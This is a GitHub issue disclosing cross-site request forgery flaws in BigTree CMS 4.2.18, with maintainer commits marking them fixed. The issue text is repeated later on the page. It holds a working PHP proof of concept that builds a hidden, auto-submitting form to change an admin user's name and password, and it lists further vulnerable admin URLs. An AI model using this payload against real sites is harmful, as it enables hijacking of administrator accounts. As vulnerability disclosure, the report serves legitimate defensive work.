Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Multiple Security Issue of CSRF exists in BigTree CMS Less than 4.2.18
one with the name、password、company parameters to the \BigTree-CMS-4.2.18\core\admin\modules\users\profile\update.php poc, updateprofile.php:
<?php $s = "<form method='post' action='http://www.victim.com/BigTree-CMS-4.2.18/site/index.php/admin/users/profile/update/'>"; $s = $s."<input type='text' value='Developer' name='name' style='display:none!important;display:block;width=0;height=0' />"; $s = $s."<input type='text' value='123123' name='password' style='display:none!important;display:block;width=0;height=0' />"; $s = $s."<input type='text' value='123123' name='company' style='display:none!important;display:block;width=0;height=0' />"; $s = $s."</form>"; $s = $s."<script>document.forms[0].submit();</script>"; echo($s); ?>
request http://www.attack.com/updateprofile.php, then you will update developer user's profile.
other csrf vuln: http://localhost/BigTree-CMS-4.2.18/site/index.php/admin/developer/packages/delete/111/ http://localhost/BigTree-CMS-4.2.18/site/index.php/admin/developer/upgrade/ignore/?versions=%5B%224.2.18%22%5D http://localhost/BigTree-CMS-4.2.18/site/index.php/admin/developer/upgrade/set-ftp-directory/
repair you my be use verifyCSRFToken() function before do these.
thank you ! email:xfkxfk@secbook.com
The text was updated successfully, but these errors were encountered:
Fixing CSRF problems in profile update and package delete.
898b8da
#293
Fixed a few more benign CSRF exploits:
4c31ad1
Fixed, thanks!
Sorry, something went wrong.
No branches or pull requests
Multiple Security Issue of CSRF exists in BigTree CMS Less than 4.2.18
one
with the name、password、company parameters to the \BigTree-CMS-4.2.18\core\admin\modules\users\profile\update.php
poc, updateprofile.php:
request http://www.attack.com/updateprofile.php, then you will update developer user's profile.
other csrf vuln:
http://localhost/BigTree-CMS-4.2.18/site/index.php/admin/developer/packages/delete/111/
http://localhost/BigTree-CMS-4.2.18/site/index.php/admin/developer/upgrade/ignore/?versions=%5B%224.2.18%22%5D
http://localhost/BigTree-CMS-4.2.18/site/index.php/admin/developer/upgrade/set-ftp-directory/
repair
you my be use verifyCSRFToken() function before do these.
thank you !
email:xfkxfk@secbook.com
The text was updated successfully, but these errors were encountered: